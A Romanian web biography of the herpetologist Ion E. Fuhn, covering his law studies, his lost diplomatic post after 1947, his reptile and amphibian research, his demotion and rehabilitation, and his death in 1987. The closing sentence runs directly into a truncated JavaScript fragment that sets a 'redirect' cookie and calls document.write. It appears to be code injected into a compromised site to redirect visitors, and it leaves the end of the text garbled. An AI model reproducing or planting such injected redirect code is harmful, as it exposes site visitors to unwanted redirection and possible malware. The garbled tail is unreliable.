Biografie – Ion E. Fuhn

19 martie 2014

Ion E. Fuhn s-a născut pe 5 februarie 1916 la București, într-o familie de comercianți ce deținea un magazin de produse pe Lipscani și care era unul din furnizorii Casei Regale.

Personalitatea lui Ion E. Fuhn s-a manifestat de timpuriu prin interesul și dorința de învățătură, fiind printre elevii eminenți ai prestigiosului liceu „Spiru Haret”, pe care l-a absolvit în anul 1933 ca șef de promoție.

A urmat facultățile de Filosofie și Drept din cadrul Universității din București, unde a obținut Licența în Drept, în anul 1938, apoi Doctoratul, în 1946, cu Teza de Doctorat intitulată „Forța obligatorie a tratatelor internaționale”.

A îmbrățișat cariera de avocat timp de 2 ani (1944-1946), iar în anul 1946, imediat după terminarea studiilor, a fost numit prin concurs Atașat de Legațiune la Ministerul Afacerilor Externe, însă în toamna anului 1947, în urma tulburărilor politice care au condus la crearea statului socialist,  și-a pierdut postul diplomatic, împreună cu toate proprietățile și bunurile familiei sale.

Întrucât nu a acceptat să fie membru de partid, a fost nevoit să-și schimbe complet domeniul de activitate, de la activități bazate pe idei, la activități pur științifice. Încă din tinerețe fusese pasionat de studiul faunei, cu prezență publicistică de la vârsta de 16 ani, astfel că, din anul 1947, studiul amfibienilor și reptilelor a devenit pentru juristul Ion E. Fuhn unica profesie și pasiune, în care s-a afirmat cu numeroase publicații considerate de referință de către specialiștii din țară și din străinătate.

În 1947 a fost numit șef de sector – științe naturale la Institutul de Studii Româno-Sovietic, iar în anul 1954, pe când lucra ca cercetător la Institut, a întâlnit-o pe Eugenia Simian, care ulterior i-a devenit soție. În urma acestei frumoase căsătorii s-a născut singurul lor copil, o fiică pe nume Iris Ruxandra Fuhn.

Iris Ruxandra Fuhn s-a casătorit în anul 1980 cu herpetologul elvețian dr. Georg Heinrich Thommen, un admirator al lui Ion E. Fuhn. Dr. Georg Heinrich Thommen-Fuhn a decedat în anul 2013, dar pasiunea pentru acest domeniu s-a transmis unuia dintre cei doi fii ai lui și nepot al lui Ion E. Fuhn, Albert Thommen, care continuă cariera de biolog, fiind doctorand al Universității din Dresda.

În perioada 1954-1957, Ion E. Fuhn a depus o activitate de cercetare continuă în cadrul Institutului de Biologie al Academiei Române din București.

Cu toate că a fost cel mai bun herpetolog al României, el a trecut prin numeroase situații dificile în cariera sa, sub pretextul că studiile universitare finalizate nu au fost în domeniul biologiei. Astfel, în anul 1958 i s-a desfăcut contractul de muncă pe motiv că „angajatul nu corespundea muncii pe care o avea potrivit contractului său de muncă”, deși anterior, chiar în același an, fusese numit prin concurs cercetator principal în Colectivul Fauna R.P.R. al Academiei. A fost retrogradat de la funcția de cercetător principal la funcția de tehnician. Tot din acest motiv a trecut și prin numeroase litigii cu editurile, foarte multe publicații ale autorului nemaiputând fi editate cu numele lui. Abia după 11 ani, în anul 1969, a fost reabilitat și numit din nou cercetator principal.

În pofida acestor dificultăți, recunoașterea activității sale de cercetare a fost confirmată de apartenența la prestigioase organisme naționale și internaționale – membru al Societății de Științele Naturii și Geografie din R.S.R., custode onorific în Comisia Monumentelor Naturii, membru al Society for Systematic Zoology, S.U.A., membru al Society of Ichtyologists and Herpetologists. Activitatea sa în domeniul herpetologiei i-a adus în anul 1966 distincția de a fi primul biolog român ales membru corespondent al Senckenbergische Naturforschende Gesellschaft din Frankfurt pe Main, Republica Federală Germania, instituție științifică prestigioasă care datează din anul 1817.

Ca om de teren și de laborator, a întocmit o numeroasă colecție de exemplare, recoltate atât din împrejurimile capitalei, cât și din diferite zone ale țării. Colecția sa a fost transferată la Muzeul Național de Istorie Naturală „Grigore Antipa”, fiind și astăzi o incontestabilă bază pentru studiul variabilității amfibienilor și reptilelor din țara noastră. În această privință Ion E. Fuhn a fost primul zoolog român care a înțeles că în herpetologie nu este suficientă doar identificarea speciei, ci și analiza populațiilor și delimitarea subspeciilor.

Chiar dacă era un domeniu cu totul nou pentru el, Ion E. Fuhn a fost solicitat să se ocupe și de sistematica unui alt grup de animale, și anume grupul Araneae (Păianjenii). Cu toate acestea a reușit să se documenteze în timp util și să inițieze în acest domeniu mai multe cercetări originale.

Zoolog autodidact cu o cultură umanistă foarte dezvoltată, a reușit să depășească limitele unui taxonomist cu orizont restrâns, uimind adeseori, prin cultura sa zoologică, biologi cu studii superioare de profil.

Având o temeinică pregătire filozofică și cunoscând mai multe limbi (română, engleză, franceză, germană), Ion E. Fuhn a lucrat în colectivul de traducere a operelor lui Darwin și a colaborat cu scenariști, în calitate de consultant științific, la filme de scurt metraj.

Constantin Kiritzescu, Raul Călinescu și Mihai Băcescu sunt considerați întemeietorii herpetologiei în țara noastră, cei care au întocmit primele colecții științifice și primele liste faunistice. Lucrările lor au avut o deosebită contribuție pentru dezvoltarea cercetărilor ulterioare asupra biologiei, zoogeografiei și sistematicii infraspecifice a amfibienilor și reptilelor. Dar Ion E. Fuhn are meritul de a fi dezvoltat, între anii 1950-1987, aceste domenii, publicând peste 80 de lucrări științifice și cărți de specialitate.

În ziua de 30 August 1987 savantul Ion E. Fuhn s-a stins din viață, în urma unei îndelungate suferințe care a culminat printr-o criză fatală de astm.

Toate aceste informații au fost oferite de Eugenia Fuhn, soția marelui herpetolog, care în prezent are frumoasa vârstă de 87 de ani. Mulți înainte! =(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘

Facebooktwitterlinkedinrssyoutube